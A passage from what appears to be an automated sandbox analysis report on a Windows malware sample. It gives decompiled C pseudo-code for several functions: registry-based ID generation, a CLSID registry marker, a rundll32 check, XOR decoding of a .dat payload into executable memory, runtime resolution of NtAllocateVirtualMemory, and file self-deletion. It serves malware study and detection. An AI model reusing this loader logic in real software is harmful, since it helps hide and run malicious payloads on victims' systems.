						 *(_t175 + _t166 * 2 - 0x54) = _t119 + 0xffffffe0; // to upper case
					}
					if( *(_t175 + _t166 * 2 - 0x54) != 0x2d) {
						asm("cdq");
						 *(_t175 + _t166 * 2 - 0x54) =  *(_t175 + _t166 * 2 - 0x54) ^  *(_t142 + _t166 % _t171 * 2);
						_t145 =  *(_t175 + _t166 * 2 - 0x54) & 0x0000ffff;
						if(_t145 >= 0x30) {
							_t89 = _t145 - 0x3a; // -13
							if(_t89 > 6) {
								if(_t145 > 0x5a) {
									 *(_t175 + _t166 * 2 - 0x54) = 0x5a - _t145 % 0x1a; // 'Z' - c % 26
								}
							} else {
								 *(_t175 + _t166 * 2 - 0x54) = _t145 % 0x1a + 0x41; // 'A' + c % 26
							}
						} else {
							 *(_t175 + _t166 * 2 - 0x54) = _t145 % 0xa + 0x30; // '0' + c % 10
						}
					}
					_t166 = _t166 + 1;
				} while (_t166 < 0x25);
				// wcscpy(output, template): copy the derived string to the caller's buffer
				_t156 =  &_v88;
				_t173 = _v264 - _t156;
				do {
					_t147 =  *_t156 & 0x0000ffff;
					_t156 =  &(_t156[1]);
					 *(_t173 + _t156 - 2) = _t147;
				} while (_t147 != 0);
				return E04ED572E(_v8 ^ _t175); // stack cookie check
			}

(per-line instruction addresses 0x04ec6019 to 0x04ec6306 for the listing above, detached from their code lines by extraction)
                                                                                    0x04ec630b
                                                                                    0x04ec6320

                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                    • RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValue
                                                                                    • String ID: -$-$-$0$2$2$2$3$6$6$6$6$6$7$C$F$F$G$J$M$R$R$S$S$W$\$\$c$d$e$f$i$i$o$p$p$r$r$r$s$u$y
                                                                                    • API String ID: 3677997916-1672344200
                                                                                    • Opcode ID: eae8f7316728f914e1e69dc1766f0c01b92c42bf41b2b88d0b4607c71b81fb25
                                                                                    • Instruction ID: fccfb116f62dd6f835410c3faacee6f9009c3fad60a3e18a15f77f3023223afe
                                                                                    • Opcode Fuzzy Hash: eae8f7316728f914e1e69dc1766f0c01b92c42bf41b2b88d0b4607c71b81fb25
                                                                                    • Instruction Fuzzy Hash: 7A816F70D0021DCADB25CFA4D9447EEBBB5FF45308F0091AED9496B201E7B95A89CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 92%
                                                                                    			E04ECBE90(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                                                    				signed int _v8;
                                                                                    				char _v208;
                                                                                    				short _v728;
                                                                                    				short _v1248;
                                                                                    				short _v1768;
                                                                                    				long _v1772;
                                                                                    				signed int _t19;
                                                                                    				int _t31;
                                                                                    				int _t34;
                                                                                    				void* _t37;
                                                                                    				signed int _t39;
                                                                                    				void* _t43;
                                                                                    				void* _t46;
                                                                                    				void* _t48;
                                                                                    				void* _t50;
                                                                                    				void* _t58;
                                                                                    				void* _t61;
                                                                                    				void* _t64;
                                                                                    				void* _t67;
                                                                                    				intOrPtr _t68;
                                                                                    				intOrPtr _t70;
                                                                                    				void* _t93;
                                                                                    				long _t94;
                                                                                    				void* _t96;
                                                                                    				void* _t97;
                                                                                    				void* _t98;
                                                                                    				signed int _t99;
                                                                                    
                                                                                    				_t64 = __ecx;
                                                                                    				_t61 = __ebx;
                                                                                    				_t19 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t19 ^ _t99;
                                                                                    				_t96 = GetModuleFileNameW;
                                                                                    				_t93 = __ecx;
                                                                                    				GetModuleFileNameW(0,  &_v1248, 0x104);
                                                                                    				if(lstrcmpiW(E04EDD5EE( &_v1248, 0x5c) + 2, L"rundll32.exe") != 0) {
                                                                                    					GetModuleFileNameW(0,  &_v728, 0x104);
                                                                                    					_t31 = E04EDD5EE( &_v728, 0x2e) + 2;
                                                                                    					__eflags = _t31;
                                                                                    					if(_t31 != 0) {
                                                                                    						_t67 =  *L"dat"; // 0x610064
                                                                                    						 *_t31 = _t67;
                                                                                    						_t68 =  *0x4efe650; // 0x74
                                                                                    						 *((intOrPtr*)(_t31 + 4)) = _t68;
                                                                                    						_t34 = PathFileExistsW( &_v728);
                                                                                    						__eflags = _t34;
                                                                                    						if(_t34 != 0) {
                                                                                    							goto L5;
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					_push(_t64);
                                                                                    					_t58 = E04ECBD70(_t93,  &_v1768,  &_v728);
                                                                                    					_t106 = _t58;
                                                                                    					if(_t58 != 0) {
                                                                                    						MoveFileExW( &_v1768, 0, 4); // executed
                                                                                    						L5:
                                                                                    						E04EDDAD0(_t93,  &_v208, 0, 0xc8);
                                                                                    						_t37 = E04EC6F80(_t61,  &_v208, _t93, _t96, _t106); // executed
                                                                                    						_t97 = _t37;
                                                                                    						_t107 = _t97;
                                                                                    						if(_t97 <= 0) {
                                                                                    							_t70 =  *0x4f055f8; // 0x378, executed
                                                                                    							E04EC6C30(_t61, _t70, _t93, _t97, __eflags); // executed
                                                                                    						} else {
                                                                                    							E04EC6C30(_t61, _t97, _t93, _t97, _t107);
                                                                                    							E04EC6DB0( &_v208, _t97);
                                                                                    						}
                                                                                    						_t39 = E04EC5920(); // executed
                                                                                    						_v1772 = 0;
                                                                                    						asm("sbb eax, eax");
                                                                                    						_t43 = E04EC9740( &_v1772,  &_v728,  ~( ~_t39) + 1); // executed
                                                                                    						_t98 = _t43;
                                                                                    						if(_t98 != 0) {
                                                                                    							_t94 = _v1772;
                                                                                    							_t109 = _t94;
                                                                                    							if(_t94 != 0) {
                                                                                    								E04EC9680(_t61, _t98, _t94, _t94, _t98, _t109); // executed
                                                                                    								E04EC5500(_t98, _t94);
                                                                                    								_t46 = E04EC94A0(_t61, L"Control", _t94, _t98, _t109); // executed
                                                                                    								if(_t46 == 0x1fffffff || _t46 == 0x2fffffff) {
                                                                                    									E04EB78A0(_t61, L"Control", 0, _t94, _t98, 0);
                                                                                    								}
                                                                                    								_t48 = E04EC94A0(_t61, L"Dispatch", _t94, _t98, 0); // executed
                                                                                    								if(_t48 == 0x1fffffff || _t48 == 0x2fffffff) {
                                                                                    									E04EB78A0(_t61, L"Dispatch", 0, _t94, _t98, 0);
                                                                                    								}
                                                                                    								_t50 = E04ECB9A0(_t61, _t98, _t94, _t94, _t98); // executed
                                                                                    								if(_t50 <= 0) {
                                                                                    									_push(_t61);
                                                                                    									do {
                                                                                    										E04ECB800();
                                                                                    										Sleep(0x3e8);
                                                                                    									} while (E04ECB9A0(Sleep, _t98, _t94, _t94, _t98) <= 0);
                                                                                    								}
                                                                                    								VirtualFree(_t98, 0, 0x8000); // executed
                                                                                    								DeleteFileW( &_v728); // executed
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    				return E04ED572E(_v8 ^ _t99);
                                                                                    			}


                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000001,00000000), ref: 04ECBEBB
                                                                                    • lstrcmpiW.KERNEL32(-00000002,rundll32.exe), ref: 04ECBED7
                                                                                    • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 04ECBF0C
                                                                                      • Part of subcall function 04EC6C30: wsprintfW.USER32 ref: 04EC6C78
                                                                                      • Part of subcall function 04EC6C30: RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,?), ref: 04EC6CB5
                                                                                      • Part of subcall function 04EC6C30: RegQueryValueExW.ADVAPI32(?,04EFD09C,00000000,?,?,?), ref: 04EC6CE0
                                                                                      • Part of subcall function 04EC6C30: RegCloseKey.ADVAPI32(?), ref: 04EC6CF6
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 04ECBF1C
                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 04ECBF50
                                                                                    • Sleep.KERNEL32(000003E8,?), ref: 04ECC061
                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04ECC079
                                                                                    • DeleteFileW.KERNEL32(?), ref: 04ECC086
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$ModuleName$CloseDeleteExistsFreeMoveOpenPathQuerySleepValueVirtuallstrcmpiwsprintf
                                                                                    • String ID: Control$Dispatch$dat$rundll32.exe
                                                                                    • API String ID: 2408718126-2128312152
                                                                                    • Opcode ID: 9973d3c5247aab3edd5bc07c778df7a1efc32be28d4c3265719185b677ef2399
                                                                                    • Instruction ID: ea1f2c9bd60c37f3a1d7f02cf563554907264c6101d8e0b389c3f4b4d7315ded
                                                                                    • Opcode Fuzzy Hash: 9973d3c5247aab3edd5bc07c778df7a1efc32be28d4c3265719185b677ef2399
                                                                                    • Instruction Fuzzy Hash: 8C41D971E002189BFB24A734DE46FAE73699FC0218F14515DD909E72C0EE74FE468B91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 94%
                                                                                    			E04EC6C30(void* __ebx, char __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                    				signed int _v8;
                                                                                    				char _v88;
                                                                                    				short _v608;
                                                                                    				void* _v612;
                                                                                    				char _v616;
                                                                                    				int _v620;
                                                                                    				int _v624;
                                                                                    				signed int _t28;
                                                                                    				long _t38;
                                                                                    				long _t41;
                                                                                    				char _t57;
                                                                                    				signed int _t71;
                                                                                    
                                                                                    				_t28 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t28 ^ _t71;
                                                                                    				_t57 = __ecx;
                                                                                    				_v616 = 0;
                                                                                    				_v620 = 4;
                                                                                    				E04EC6010(__ecx, L"SEOID",  &_v88, __edi, __esi); // executed
                                                                                    				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                                                    				E04EDDAD0(__edi,  &_v616, 0, _v620);
                                                                                    				_v612 = 0;
                                                                                    				_t38 = RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20119,  &_v612); // executed
                                                                                    				if(_t38 != 0) {
                                                                                    					L3:
                                                                                    					_v616 = _t57;
                                                                                    					_v620 = 4;
                                                                                    					_v612 = 0;
                                                                                    					_t41 = RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0); // executed
                                                                                    					if(_t41 != 0) {
                                                                                    						L5:
                                                                                    						return E04ED572E(_v8 ^ _t71);
                                                                                    					} else {
                                                                                    						RegSetValueExW(_v612, "1", 0, 4,  &_v616, 4); // executed
                                                                                    						_t69 =  ==  ? 1 : 0;
                                                                                    						RegCloseKey(_v612);
                                                                                    						__eflags =  ==  ? 1 : 0;
                                                                                    						if(( ==  ? 1 : 0) != 0) {
                                                                                    							goto L2;
                                                                                    						} else {
                                                                                    							goto L5;
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					RegQueryValueExW(_v612, "1", 0,  &_v624,  &_v616,  &_v620);
                                                                                    					_t70 =  ==  ? 1 : 0;
                                                                                    					RegCloseKey(_v612);
                                                                                    					_t77 =  ==  ? 1 : 0;
                                                                                    					if(( ==  ? 1 : 0) == 0) {
                                                                                    						goto L3;
                                                                                    					} else {
                                                                                    						L2:
                                                                                    						return E04ED572E(_v8 ^ _t71);
                                                                                    					}
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                      • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                      • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                      • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    • wsprintfW.USER32 ref: 04EC6C78
                                                                                    • RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,?), ref: 04EC6CB5
                                                                                    • RegQueryValueExW.ADVAPI32(?,04EFD09C,00000000,?,?,?), ref: 04EC6CE0
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EC6CF6
                                                                                    • RegCreateKeyExW.KERNEL32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 04EC6D4B
                                                                                    • RegSetValueExW.KERNEL32(?,04EFD09C,00000000,00000004,?,00000004), ref: 04EC6D6C
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EC6D82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseValue$OpenQuery$Createwsprintf
                                                                                    • String ID: SEOID$SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 3707868688-3437544703
                                                                                    • Opcode ID: e97898d69f8aea7d4ae0494316592c10075f458ca3a312deb01f733e68ab7b8b
                                                                                    • Instruction ID: 44a9a8a4655b309d34b69c84579b05145f20cf9ac7ecc27749e4750ba27e39c5
                                                                                    • Opcode Fuzzy Hash: e97898d69f8aea7d4ae0494316592c10075f458ca3a312deb01f733e68ab7b8b
                                                                                    • Instruction Fuzzy Hash: 2131507190522CABDB209FA1ED49FEBBBBCEF44715F100199BE09E2104D636AE44DF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 92%
                                                                                    			E04EC94A0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                    				signed int _v8;
                                                                                    				char _v88;
                                                                                    				short _v608;
                                                                                    				char _v612;
                                                                                    				void* _v616;
                                                                                    				int _v620;
                                                                                    				int _v624;
                                                                                    				signed int _t25;
                                                                                    				long _t35;
                                                                                    				char _t44;
                                                                                    				void* _t49;
                                                                                    				signed int _t65;
                                                                                    
                                                                                    				_t25 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t25 ^ _t65;
                                                                                    				E04EC6010(__ebx, __ecx,  &_v88, __edi, __esi); // executed
                                                                                    				_v612 = 0;
                                                                                    				_v620 = 4;
                                                                                    				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                                                    				E04EDDAD0(__edi,  &_v612, 0, _v620);
                                                                                    				_v616 = 0;
                                                                                    				_t35 = RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20119,  &_v616); // executed
                                                                                    				if(_t35 != 0) {
                                                                                    					L6:
                                                                                    					goto L7;
                                                                                    				} else {
                                                                                    					RegQueryValueExW(_v616, "1", 0,  &_v624,  &_v612,  &_v620);
                                                                                    					_t64 =  ==  ? 1 : 0;
                                                                                    					RegCloseKey(_v616);
                                                                                    					_t72 =  ==  ? 1 : 0;
                                                                                    					if(( ==  ? 1 : 0) == 0) {
                                                                                    						goto L6;
                                                                                    					} else {
                                                                                    						_t44 = _v612 - 0x13c;
                                                                                    						_v612 = _t44;
                                                                                    						if(_t44 == 0x1fffffff || _t44 == 0x2fffffff) {
                                                                                    							L7:
                                                                                    							return E04ED572E(_v8 ^ _t65);
                                                                                    						} else {
                                                                                    							wsprintfW( &_v608, L"Global\\%s",  &_v88);
                                                                                    							_t49 = OpenEventW(0x1f0003, 0,  &_v608);
                                                                                    							if(_t49 == 0) {
                                                                                    								return E04ED572E(_v8 ^ _t65);
                                                                                    							} else {
                                                                                    								CloseHandle(_t49);
                                                                                    								goto L6;
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                      • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                      • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                      • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    • wsprintfW.USER32 ref: 04EC94E0
                                                                                    • RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,?), ref: 04EC951D
                                                                                    • RegQueryValueExW.ADVAPI32(?,04EFD09C,00000000,?,00000000,?), ref: 04EC954C
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EC9562
                                                                                    • wsprintfW.USER32 ref: 04EC959B
                                                                                    • OpenEventW.KERNEL32(001F0003,00000000,?), ref: 04EC95B2
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC95BD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseOpen$QueryValuewsprintf$EventHandle
                                                                                    • String ID: Global\%s$SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 1348839613-2346361075
                                                                                    • Opcode ID: e1557e6c69c037a939908562d5759c0ec88d104a72c77be1aad43a70955c46a7
                                                                                    • Instruction ID: 4adb66b663640727fb762e1895d2b0d4d6c89f115bc320f862bbd438627ed031
                                                                                    • Opcode Fuzzy Hash: e1557e6c69c037a939908562d5759c0ec88d104a72c77be1aad43a70955c46a7
                                                                                    • Instruction Fuzzy Hash: 913145B190521CABDB20DFA0DD49FEEB7BCEF44305F100699AD09E2144EA75AE45CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 52%
                                                                                    			E04EC8C20(intOrPtr __ecx, char __edx) {
                                                                                    				intOrPtr _v8;
                                                                                    				void* _v16;
                                                                                    				char _v20;
                                                                                    				intOrPtr _v24;
                                                                                    				char _v28;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				intOrPtr* _t13;
                                                                                    				intOrPtr _t22;
                                                                                    				char _t23;
                                                                                    				void* _t24;
                                                                                    				_Unknown_base(*)()* _t26;
                                                                                    				char _t28;
                                                                                    				intOrPtr _t31;
                                                                                    				struct HINSTANCE__* _t32;
                                                                                    				intOrPtr _t33;
                                                                                    				void* _t35;
                                                                                    
                                                                                    				_t28 = __edx;
                                                                                    				_t33 =  *0x4f06b34; // 0x7ffc
                                                                                    				_t23 = __edx;
                                                                                    				_t31 =  *0x4f06b30; // 0x8dcda280
                                                                                    				_v8 = __ecx;
                                                                                    				if(_t31 != 0 || _t33 != 0) {
                                                                                    					L7:
                                                                                    					_push(0);
                                                                                    					_push(0x40);
                                                                                    					_push(0);
                                                                                    					_push(0x3000);
                                                                                    					_v28 = _t23;
                                                                                    					asm("cdq");
                                                                                    					asm("xorps xmm0, xmm0");
                                                                                    					_push(_t28);
                                                                                    					_push( &_v28);
                                                                                    					_push(0);
                                                                                    					_push(0);
                                                                                    					asm("movlpd [ebp-0x10], xmm0");
                                                                                    					asm("cdq");
                                                                                    					_push(_t28);
                                                                                    					asm("cdq");
                                                                                    					_v24 = 0;
                                                                                    					_t24 = E04EC8170(_t31, _t33, 6, _v8, _t28,  &_v20);
                                                                                    					if(_t24 != 0 || _t28 != 0) {
                                                                                    						_t13 =  *0x4f06b48;
                                                                                    						if(_t13 == 0) {
                                                                                    							L12:
                                                                                    							_t32 = GetModuleHandleW(L"ntdll.dll");
                                                                                    							 *0x4f06b48 = GetProcAddress(_t32, "RtlNtStatusToDosError");
                                                                                    							_t26 = GetProcAddress(_t32, "RtlSetLastWin32Error");
                                                                                    							_t13 =  *0x4f06b48;
                                                                                    							 *0x4f06b28 = _t26;
                                                                                    						} else {
                                                                                    							_t26 =  *0x4f06b28;
                                                                                    							if(_t26 == 0) {
                                                                                    								goto L12;
                                                                                    							}
                                                                                    						}
                                                                                    						if(_t13 != 0 && _t26 != 0) {
                                                                                    							RtlRestoreLastWin32Error( *_t13(_t24));
                                                                                    						}
                                                                                    						goto L16;
                                                                                    					} else {
                                                                                    						return _v20;
                                                                                    					}
                                                                                    				} else {
                                                                                    					_t21 =  *0x4f06b40; // 0x8dc40000
                                                                                    					_t28 =  *0x4f06b44; // 0x7ffc
                                                                                    					if(_t21 == 0 && _t28 == 0) {
                                                                                    						 *0x4f06b40 = E04EC8350(__ecx);
                                                                                    						 *0x4f06b44 = _t28;
                                                                                    					}
                                                                                    					_t22 = E04EC8B50(_t23, "NtAllocateVirtualMemory", _t28, _t31, _t33, _t21, _t28); // executed
                                                                                    					_t31 = _t22;
                                                                                    					_t35 = _t35 + 8;
                                                                                    					 *0x4f06b30 = _t31;
                                                                                    					_t33 = _t28;
                                                                                    					 *0x4f06b34 = _t33;
                                                                                    					if(_t31 != 0 || _t33 != 0) {
                                                                                    						goto L7;
                                                                                    					} else {
                                                                                    						L16:
                                                                                    						return 0;
                                                                                    					}
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,?,?,?,74E057B0,00000000,04ECBC35), ref: 04EC8CFE
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 04EC8D12
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 04EC8D1F
                                                                                    • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 04EC8D3A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$ErrorHandleLastModuleRestoreWin32
                                                                                    • String ID: NtAllocateVirtualMemory$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                                    • API String ID: 3496116238-3017390355
                                                                                    • Opcode ID: 674916fd6ae8b0ceaa64c58fedb98de93012b4a257a505df3ba2eaac55eb1d44
                                                                                    • Instruction ID: 8307d6b70b1fbfb1d4f4fa7cd6dbf8db180131622b25f99a4852c77375924651
                                                                                    • Opcode Fuzzy Hash: 674916fd6ae8b0ceaa64c58fedb98de93012b4a257a505df3ba2eaac55eb1d44
                                                                                    • Instruction Fuzzy Hash: 5E31ADF4B012195BE710EF5AAF40B7AB7AEFBC4719F14116DEE04E3200E774AC5586A1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E04EC9740(intOrPtr* __ecx, WCHAR* __edx, intOrPtr _a4) {
                                                                                    				void _v8;
                                                                                    				long _v12;
                                                                                    				void* _v16;
                                                                                    				void* _v20;
                                                                                    				intOrPtr* _v24;
                                                                                    				void* _t36;
                                                                                    				intOrPtr _t40;
                                                                                    				void* _t41;
                                                                                    				signed char _t46;
                                                                                    				int _t52;
                                                                                    				void _t53;
                                                                                    				long _t60;
                                                                                    				void* _t62;
                                                                                    				intOrPtr* _t67;
                                                                                    				WCHAR* _t68;
                                                                                    				long _t69;
                                                                                    				long _t71;
                                                                                    				void* _t76;
                                                                                    
                                                                                    				_t68 = __edx;
                                                                                    				_t76 = 0;
                                                                                    				_v24 = __ecx;
                                                                                    				_v8 = 0;
                                                                                    				_v12 = 0;
                                                                                    				if(__ecx != 0) {
                                                                                    					 *__ecx = 0;
                                                                                    				}
                                                                                    				_t36 = CreateFileW(_t68, 0x80000000, 0, 0, 3, 0x80, 0); // executed
                                                                                    				_v16 = _t36;
                                                                                    				if(_t36 == 0xffffffff) {
                                                                                    					L32:
                                                                                    					return _t76;
                                                                                    				} else {
                                                                                    					_t60 = GetFileSize(_t36, 0);
                                                                                    					_v20 = _t76;
                                                                                    					if(_t60 < 1) {
                                                                                    						L31:
                                                                                    						FindCloseChangeNotification(_v16); // executed
                                                                                    						goto L32;
                                                                                    					} else {
                                                                                    						_t40 = _a4;
                                                                                    						if(_t40 != 1) {
                                                                                    							if(_t40 != 2) {
                                                                                    								_t71 = _t60;
                                                                                    								goto L15;
                                                                                    							} else {
                                                                                    								_t52 = ReadFile(_v16,  &_v8, 4,  &_v12, 0); // executed
                                                                                    								if(_t52 == 0) {
                                                                                    									goto L30;
                                                                                    								} else {
                                                                                    									_t53 = _v8;
                                                                                    									if(_t53 > _t60) {
                                                                                    										_t53 = _t53 - 0xc8372a;
                                                                                    										_v20 = 1;
                                                                                    										_v8 = _t53;
                                                                                    									}
                                                                                    									_t71 = _t60 - _t53 - 4;
                                                                                    									if(_t71 < 1) {
                                                                                    										goto L30;
                                                                                    									} else {
                                                                                    										_t62 = _v16;
                                                                                    										SetFilePointer(_t62, _t53 + 4, 0, 0); // executed
                                                                                    										goto L16;
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    						} else {
                                                                                    							if(ReadFile(_v16,  &_v8, 4,  &_v12, 0) == 0) {
                                                                                    								L30:
                                                                                    								goto L31;
                                                                                    							} else {
                                                                                    								_t71 = _v8;
                                                                                    								if(_t71 > _t60) {
                                                                                    									_t71 = _t71 - 0xc8372a;
                                                                                    									_v20 = 1;
                                                                                    									_v8 = _t71;
                                                                                    								}
                                                                                    								L15:
                                                                                    								_t62 = _v16;
                                                                                    								L16:
                                                                                    								_t41 = VirtualAlloc(0, _t71, 0x1000, 0x40); // executed
                                                                                    								_t76 = _t41;
                                                                                    								if(_t76 == 0 || ReadFile(_t62, _t76, _t71,  &_v12, 0) == 0) {
                                                                                    									goto L30;
                                                                                    								} else {
                                                                                    									_t69 = _v12;
                                                                                    									if(_t69 == _t71) {
                                                                                    										if(_v20 != 0 && _t69 > 1) {
                                                                                    											_t46 = 0;
                                                                                    											if(_t69 != 0) {
                                                                                    												do {
                                                                                    													if((_t46 & 0x00000001) != 0) {
                                                                                    														 *(_t76 + _t46) =  *(_t76 + _t46) ^ 0x0000006a;
                                                                                    													} else {
                                                                                    														 *(_t76 + _t46) =  *(_t76 + _t46) ^ 0x000000a7;
                                                                                    													}
                                                                                    													_t46 = _t46 + 1;
                                                                                    												} while (_t46 < _t69);
                                                                                    												_t69 = _v12;
                                                                                    											}
                                                                                    										}
                                                                                    										E04EC5500(_t76, _t69);
                                                                                    										_t67 = _v24;
                                                                                    										if(_t67 != 0) {
                                                                                    											 *_t67 = _v12;
                                                                                    										}
                                                                                    										goto L30;
                                                                                    									} else {
                                                                                    										VirtualFree(_t76, 0, 0x8000);
                                                                                    										CloseHandle(_v16);
                                                                                    										return 0;
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,?,?,04ECBFCE,00000001), ref: 04EC976D
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,04ECBFCE,00000001), ref: 04EC9783
                                                                                    • ReadFile.KERNEL32(?,00000001,00000004,04ECBFCE,00000000,00000000,?,?,?,04ECBFCE,00000001), ref: 04EC97EC
                                                                                    • SetFilePointer.KERNEL32(?,-00000003,00000000,00000000,?,?,?,04ECBFCE,00000001), ref: 04EC9828
                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,?,?,04ECBFCE,00000001), ref: 04EC983F
                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,04ECBFCE,00000000,?,?,?,04ECBFCE,00000001), ref: 04EC9854
                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,04ECBFCE,00000001), ref: 04EC986D
                                                                                    • CloseHandle.KERNEL32(?,?,?,04ECBFCE,00000001), ref: 04EC9879
                                                                                    • FindCloseChangeNotification.KERNEL32(?,?,?,?,04ECBFCE,00000001), ref: 04EC98C5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$CloseReadVirtual$AllocChangeCreateFindFreeHandleNotificationPointerSize
                                                                                    • String ID:
                                                                                    • API String ID: 3130169213-0
                                                                                    • Opcode ID: c33d4010a682babe9c9c40bea467998fc3401cde9b25b86f2981b705853d3c13
                                                                                    • Instruction ID: 3d37dfa5805f80914a236cd0e8a0df336a0ba21828a7e360bc1579364a20a7f7
                                                                                    • Opcode Fuzzy Hash: c33d4010a682babe9c9c40bea467998fc3401cde9b25b86f2981b705853d3c13
                                                                                    • Instruction Fuzzy Hash: 6941B7B2F00215ABDB20CFA4DD44BAEBB79FB44714F205569E910EB281DB71EA02CB54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 95%
                                                                                    			E04EC9680(void* __ebx, char* __ecx, int __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                    				signed int _v8;
                                                                                    				char _v88;
                                                                                    				short _v608;
                                                                                    				void* _v612;
                                                                                    				signed int _t11;
                                                                                    				int _t20;
                                                                                    				char* _t26;
                                                                                    				int _t35;
                                                                                    				signed int _t38;
                                                                                    
                                                                                    				_t11 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t11 ^ _t38;
                                                                                    				_t35 = __edx;
                                                                                    				_t26 = __ecx;
                                                                                    				E04EC5490(__ecx, __edx);
